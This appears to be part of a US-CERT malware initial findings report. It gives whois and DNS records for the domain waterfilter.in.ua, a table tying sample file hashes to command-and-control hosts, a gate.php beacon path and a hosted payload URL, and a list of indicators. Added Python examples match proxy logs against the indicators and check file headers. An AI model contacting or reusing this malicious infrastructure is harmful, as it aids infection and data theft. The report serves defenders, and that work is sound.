% The object shown below is NOT in the UANIC database.
% It has been obtained by querying a remote server:

% (whois.in.ua) at port 43.

%

% REDIRECT BEGIN
% In.UA whois server, (whois.in.ua)
% All questions regarding this service please send to help@whois.in.ua

% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua 

domain: waterfilter.in.ua 

descr: waterfilter.in.ua 

admin-c: THST-UANIC 

tech-c: THST-UANIC 

status: OK-UNTIL 20170310000000 

nserver: ns1.thehost.com.ua 

nserver: ns2.thehost.com.ua 

nserver: ns3.thehost.com.ua 

mnt-by: THEHOST-MNT-INUA 

mnt-lower: THEHOST-MNT-INUA 

changed: hostmaster@thehost.com.ua 20160224094245 

source: INUA 


% REDIRECT END 
Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.157"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0 - 176.114.15.255 

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 

admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 

mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 
created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 
source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 
mnt-by: THEHOST-MNT

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 
source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (HEREFORD) 

DNS records

DNS query for 157.0.114.176.in-addr.arpa failed: TimedOut
name class type data time to live

waterfilter.in.ua IN NS ns3.thehost.com.ua 3600s (01:00:00)

waterfilter.in.ua IN SOA
server: ns1.thehost.com.ua
email: hostmaster@thehost.com.ua
serial: 2015031414
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 86400
3600s (01:00:00)

waterfilter.in.ua IN A 176.114.0.120 3600s (01:00:00)

waterfilter.in.ua IN NS ns1.thehost.com.ua 3600s (01:00:00)

waterfilter.in.ua IN NS ns2.thehost.com.ua 3600s (01:00:00)

waterfilter.in.ua IN TXT v=spf1 ip4:176.114.0.120 a mx ~all 3600s (01:00:00)

waterfilter.in.ua IN MX
preference: 10
exchange: mail.waterfilter.in.ua
3600s (01:00:00)

waterfilter.in.ua IN MX
preference: 20
exchange: mail.waterfilter.in.ua
3600s (01:00:00)

157.0.114.176.in-addr.arpa IN PTR waterfilter.in.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email: hostmaster@thehost.com.ua
serial: 2014044197
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 86400
3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s (01:00:00)

0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s (01:00:00)

-- end --

Relationships

(I) 176.114.0.157 Characterized_By (W) Address lookup

(I) 176.114.0.157 Related_To (D) mymodule.waterfilter.in.ua/system/logs/xtool.exe


Relationship Summary 


(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 Related_To (S) Interface for PAS v.3.1.0 

db9749089f559ada4a33f93e (93f51) 
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(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

da9f2804b16b369156e1b629ad3d2aac79326b94 
284e43c7b8355f3db71912b8 (bfcb5) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

20f76ada1721 b61963fa595e3a2006c962253513 
62b79d5d719197c190cd4239 (c3e23) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

7b28b9b85f9943342787bae1c92cab39c01f9d82b 
99eb8628abc638afd9eddaf (38f71) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

ae67c121c7b81638a7cb655864d574f8a9e55e66 
bcb9a7b01 f0719a05fab7975 (eddfe) 

(S) Interface for PAS v.3.1.0 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

da9f2804b16b369156e1b629ad3d2aac79326b94 
284e43c7b8355f3db71912b8 (bfcb5) 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Subject | Relationship | Object 
----------------------------------------------------------------------------------------------------------------------------------------------------------------- 
(F) 20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 (c3e23) | Related_To | (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 
(F) 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf (38f71) | Related_To | (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 
(F) ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975 (eddfe) | Related_To | (F) 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e (93f51) 
(F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd) | Related_To | (S) Interface for PAS v.3.0.10 
(F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd) | Related_To | (F) d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38 (fc45a) 
(S) Interface for PAS v.3.0.10 | Related_To | (F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd) 
(F) d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38 (fc45a) | Related_To | (F) 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 (78abd) 
(F) 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 (8f154) | Connected_To | (D) private.directinvesting.com 
(D) private.directinvesting.com | Characterized_By | (W) Address lookup 
(D) private.directinvesting.com | Connected_From | (F) 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 (8f154) 
(D) private.directinvesting.com | Related_To | (H) GET /lexicon/index.c 
(D) private.directinvesting.com | Related_To | (H) GET /lexicon/index.c 
(D) private.directinvesting.com | Related_To | (H) GET /lexicon/index.c 
(D) private.directinvesting.com | Related_To | (I) 204.12.12.40 
(I) 204.12.12.40 | Characterized_By | (W) Address lookup 
(I) 204.12.12.40 | Related_To | (D) private.directinvesting.com 
(F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3) | Connected_To | (D) cderlearn.com 
(F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3) | Characterized_By | (S) digital_cert_steal.bmp 
(D) cderlearn.com | Characterized_By | (W) Address lookup 
(D) cderlearn.com | Connected_From | (F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3) 
(D) cderlearn.com | Related_To | (H) POST /search.cfm HTT 
(D) cderlearn.com | Related_To | (H) POST /search.cfm HTT 
(D) cderlearn.com | Related_To | (I) 209.236.67.159 
(I) 209.236.67.159 | Characterized_By | (W) Address lookup 
(I) 209.236.67.159 | Related_To | (D) cderlearn.com 
(S) digital_cert_steal.bmp | Characterizes | (F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3) 
(W) Address lookup | Characterizes | (D) private.directinvesting.com 
(W) Address lookup | Characterizes | (D) cderlearn.com 
(W) Address lookup | Characterizes | (D) editprod.waterfilter.in.ua 
(W) Address lookup | Characterizes | (D) insta.reduct.ru 
(W) Address lookup | Characterizes | (D) one2shoppee.com 
(W) Address lookup | Characterizes | (D) ritsoperrol.ru 
(W) Address lookup | Characterizes | (D) littjohnwilhap.ru 
(W) Address lookup | Characterizes | (D) wilcarobbe.com 
(H) GET /lexicon/index.c | Related_To | (D) private.directinvesting.com 
(H) GET /lexicon/index.c | Related_To | (D) private.directinvesting.com 
(H) GET /lexicon/index.c | Related_To | (D) private.directinvesting.com 
(H) POST /search.cfm HTT | Related_To | (D) cderlearn.com 
(H) POST /search.cfm HTT | Related_To | (D) cderlearn.com 
(H) POST /zapoy/gate.php | Related_To | (D) wilcarobbe.com 
(H) POST /zapoy/gate.php | Related_To | (D) littjohnwilhap.ru 
(P) 80 | Related_To | (D) wilcarobbe.com 
(P) 80 | Related_To | (D) littjohnwilhap.ru 
(P) 80 | Related_To | (D) ritsoperrol.ru 
(H) POST /zapoy/gate.php | Related_To | (D) ritsoperrol.ru 
(P) 80 | Related_To | (D) one2shoppee.com 
(P) 80 | Related_To | (D) insta.reduct.ru 
(P) 80 | Related_To | (D) editprod.waterfilter.in.ua 
(W) Address lookup | Characterizes | (I) 146.185.161.126 
(W) Address lookup | Characterizes | (I) 176.114.0.120 
(W) Address lookup | Characterizes | (I) 209.236.67.159 
(W) Address lookup | Characterizes | (I) 204.12.12.40 
(F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a) | Dropped | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a) | Characterized_By | (S) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e 
(S) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e | Characterizes | (F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a) 
(P) 80 | Related_To | (D) mymodule.waterfilter.in.ua/system/logs/xtool.exe 
(W) Address lookup | Characterizes | (D) mymodule.waterfilter.in.ua/system/logs/xtool.exe 
(W) Address lookup | Characterizes | (I) 176.114.0.157 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Characterized_By | (S) searching_reg_pop3.bmp 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) editprod.waterfilter.in.ua 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) insta.reduct.ru 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) one2shoppee.com 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) ritsoperrol.ru 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) littjohnwilhap.ru 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) wilcarobbe.com 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Connected_To | (D) mymodule.waterfilter.in.ua/system/logs/xtool.exe 
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) | Dropped_By | (F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a) 
(S) searching_reg_pop3.bmp | Characterizes | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) wilcarobbe.com | Characterized_By | (W) Address lookup 
(D) wilcarobbe.com | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) wilcarobbe.com | Related_To | (H) POST /zapoy/gate.php 
(D) wilcarobbe.com | Related_To | (P) 80 
(D) one2shoppee.com | Characterized_By | (W) Address lookup 
(D) one2shoppee.com | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) one2shoppee.com | Related_To | (P) 80 
(D) ritsoperrol.ru | Characterized_By | (W) Address lookup 
(D) ritsoperrol.ru | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) ritsoperrol.ru | Related_To | (P) 80 
(D) ritsoperrol.ru | Related_To | (H) POST /zapoy/gate.php 
(D) littjohnwilhap.ru | Characterized_By | (W) Address lookup 
(D) littjohnwilhap.ru | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) littjohnwilhap.ru | Related_To | (H) POST /zapoy/gate.php 
(D) littjohnwilhap.ru | Related_To | (P) 80 
(D) insta.reduct.ru | Characterized_By | (W) Address lookup 
(D) insta.reduct.ru | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) insta.reduct.ru | Related_To | (P) 80 
(D) insta.reduct.ru | Related_To | (I) 146.185.161.126 
(I) 146.185.161.126 | Characterized_By | (W) Address lookup 
(I) 146.185.161.126 | Related_To | (D) insta.reduct.ru 
(D) editprod.waterfilter.in.ua | Characterized_By | (W) Address lookup 
(D) editprod.waterfilter.in.ua | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) editprod.waterfilter.in.ua | Related_To | (P) 80 
(D) editprod.waterfilter.in.ua | Related_To | (I) 176.114.0.120 
(I) 176.114.0.120 | Characterized_By | (W) Address lookup 
(I) 176.114.0.120 | Related_To | (D) editprod.waterfilter.in.ua 
(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe | Related_To | (P) 80 
(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe | Characterized_By | (W) Address lookup 
(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe | Connected_From | (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba) 
(D) mymodule.waterfilter.in.ua/system/logs/xtool.exe | Related_To | (I) 176.114.0.157 
(I) 176.114.0.157 | Characterized_By | (W) Address lookup 
(I) 176.114.0.157 | Related_To | (D) mymodule.waterfilter.in.ua/system/logs/xtool.exe 


Mitigation Recommendations 

US-CERT recommends monitoring activity to the following domain(s) and/or IP(s) as a potential indicator of infection: 

• private.directinvesting.com 

• cderlearn.com 

• 204.12.12.40 

• 209.236.67.159 

• 176.114.0.120 

• editprod.waterfilter.in.ua 

• insta.reduct.ru 

• 146.185.161.126 

• one2shoppee.com 

• ritsoperrol.ru 

• littjohnwilhap.ru 

• wilcarobbe.com 

• mymodule.waterfilter.in.ua/system/logs/xtool.exe 

• 176.114.0.157 
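
The indicators in the relationship table and in the list above, applied to log data, as an added Python example that is not part of this MIFR or of US-CERT's tooling: it matches constructed proxy log lines against the domains, IP addresses and request paths named on this page, grades a path-only match lower than a host match, and checks a SHA-256 digest against the analysed files. The log format, the sample lines, and the treatment of the truncated "/lexicon/index.c" entry as a path prefix are assumptions made for the example.

```python
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Network indicators copied from the relationship table and the list above.
IOC_DOMAINS = {
    "private.directinvesting.com", "cderlearn.com", "editprod.waterfilter.in.ua",
    "insta.reduct.ru", "one2shoppee.com", "ritsoperrol.ru", "littjohnwilhap.ru",
    "wilcarobbe.com", "mymodule.waterfilter.in.ua",
}
IOC_IPS = {"204.12.12.40", "209.236.67.159", "176.114.0.120",
           "146.185.161.126", "176.114.0.157"}
# Request paths from the (H) entries and the xtool.exe URL. The page prints
# "/lexicon/index.c" truncated, so that one is matched as a prefix (assumption).
IOC_PATH_EXACT = {"/zapoy/gate.php", "/search.cfm", "/system/logs/xtool.exe"}
IOC_PATH_PREFIX = ("/lexicon/index.c",)
# SHA-256 values of the analysed files from the (F) entries, lower-case hex.
IOC_SHA256 = {
    "249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e",
    "20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239",
    "7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf",
    "ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975",
    "6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46",
    "d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38",
    "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641",
    "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0",
    "ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e",
    "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5",
}

# Constructed proxy log lines (not real traffic) in an assumed format:
# timestamp client_ip method url status
SAMPLE_PROXY_LOG = """\
2017-01-27T10:02:11Z 10.0.0.15 GET http://www.example.com/index.html 200
2017-01-27T10:03:45Z 10.0.0.15 POST http://wilcarobbe.com/zapoy/gate.php 200
2017-01-27T10:05:02Z 10.0.0.22 GET http://146.185.161.126/update.bin 200
2017-01-27T10:06:40Z 10.0.0.30 GET http://cdn.example.net/search.cfm?q=test 200
2017-01-27T10:07:30Z 10.0.0.22 GET http://PRIVATE.DIRECTINVESTING.COM./lexicon/index.c 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def classify_request(url: str) -> List[str]:
    """Return the indicator categories a requested URL matches (empty list = no match)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    # urlsplit lower-cases the host; also drop a trailing root dot before comparing.
    host = (parts.hostname or "").rstrip(".")
    path = parts.path or "/"
    reasons = []
    if host in IOC_DOMAINS:
        reasons.append("domain")
    if host in IOC_IPS:
        reasons.append("ip")
    if path in IOC_PATH_EXACT or path.startswith(IOC_PATH_PREFIX):
        reasons.append("uri-path")
    return reasons


def scan_proxy_log(text: str) -> List[Dict[str, object]]:
    """Scan proxy log text and return one record per line that touches an indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line; a production job would count and report these
        reasons = classify_request(m["url"])
        if not reasons:
            continue
        # A host or IP match is strong evidence; a path-only match on a generic name
        # such as /search.cfm is weak and needs the host context before escalation.
        severity = "high" if ({"domain", "ip"} & set(reasons)) else "low"
        hits.append({"line": lineno, "client": m["client"], "url": m["url"],
                     "reasons": reasons, "severity": severity})
    return hits


def is_known_sample(sha256_hex: str) -> bool:
    """True if a SHA-256 digest (any case) belongs to one of the analysed files."""
    return sha256_hex.strip().lower() in IOC_SHA256


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

Run against the constructed lines, the scan flags the wilcarobbe.com and private.directinvesting.com requests and the 146.185.161.126 download as high severity, and the "/search.cfm" request to an unrelated host as low severity; that last grade is the point, since a generic path alone is not enough to declare an infection.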

US-CERT would like to remind users and administrators of the following best practices to strengthen the security posture of their 
organization's systems: 

• Maintain up-to-date antivirus signatures and engines. 

• Restrict users' ability (permissions) to install and run unwanted software applications. 

• Enforce a strong password policy and implement regular password changes. 

• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known. 

• Keep operating system patches up to date. 

• Enable a personal firewall on agency workstations. 

• Disable unnecessary services on agency workstations and servers. 

• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the 
file header). 

• Monitor users' web browsing habits; restrict access to sites with unfavorable content. 

• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.). 

• Scan all software downloaded from the Internet prior to executing. 

• Maintain situational awareness of the latest threats; implement appropriate ACLs. 
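
The "true file type" check in the list above, as an added Python example that is not part of this MIFR: it compares the extension an attachment claims with the leading bytes of its content and returns a verdict. The signature table and the test inputs are constructed for the example and cover only a handful of common types.

```python
import os
from typing import Dict, Set

# Leading bytes ("magic") for common attachment types; a small constructed table.
MAGIC: Dict[str, tuple] = {
    "rtf":  (b"{\\rtf",),
    "pdf":  (b"%PDF-",),
    "exe":  (b"MZ",),
    "dll":  (b"MZ",),
    "zip":  (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08"),
    "docx": (b"PK\x03\x04",),
    "xlsx": (b"PK\x03\x04",),
    "doc":  (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",),
    "xls":  (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "jpg":  (b"\xff\xd8\xff",),
    "gif":  (b"GIF87a", b"GIF89a"),
    "bmp":  (b"BM",),
}
HEAD_LEN = 16  # the longest signature above is 8 bytes; 16 leaves headroom


def detected_types(head: bytes) -> Set[str]:
    """Extensions whose magic bytes match the start of the file."""
    return {ext for ext, sigs in MAGIC.items() if head.startswith(sigs)}


def check_attachment(filename: str, head: bytes) -> Dict[str, object]:
    """Compare the claimed extension with the file header and return a verdict."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    found = detected_types(head)
    if ext in MAGIC and ext not in found:
        verdict = "mismatch"      # the extension does not describe the content
    elif "exe" in found:
        verdict = "executable"    # a PE image, whatever the file is called
    elif ext in MAGIC:
        verdict = "ok"
    else:
        verdict = "unknown"       # no signature on file for this extension
    return {"file": filename, "ext": ext, "detected": sorted(found), "verdict": verdict}


def check_path(path: str) -> Dict[str, object]:
    """Read only the header of a file on disk and run the same check."""
    with open(path, "rb") as fh:
        return check_attachment(os.path.basename(path), fh.read(HEAD_LEN))
```

The check validates only the outer container: a file that really is RTF, like the malicious document analysed in this report, still passes, so it complements scanning the attachment's content rather than replacing it.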


Contact Information 


• 1-888-282-0870 

• soc@us-cert.gov (UNCLASS) 

• us-cert@dhs.sgov.gov (SIPRNET) 

• us-cert@dhs.ic.gov (JWICS) 

US-CERT continuously strives to improve its products and services. You can help by answering a very short series of questions about this 
product at the following URL: https://forms.us-cert.gov/ncsd-feedback/ 


Document FAQ 


What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In 
most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact 
US-CERT and provide information regarding the level of desired analysis. 

Can I distribute this to other people? This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when 
information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. 
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document 
should be directed to the US-CERT Security Operations Center at 1-888-282-0870 or soc@us-cert.gov. 

Can I submit malware to US-CERT? US-CERT encourages you to report any suspicious activity, including cybersecurity incidents, possible 
malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at 
www.us-cert.gov. Malware samples can be submitted via https://malware.us-cert.gov. Alternative submission methods are available by special 
request. 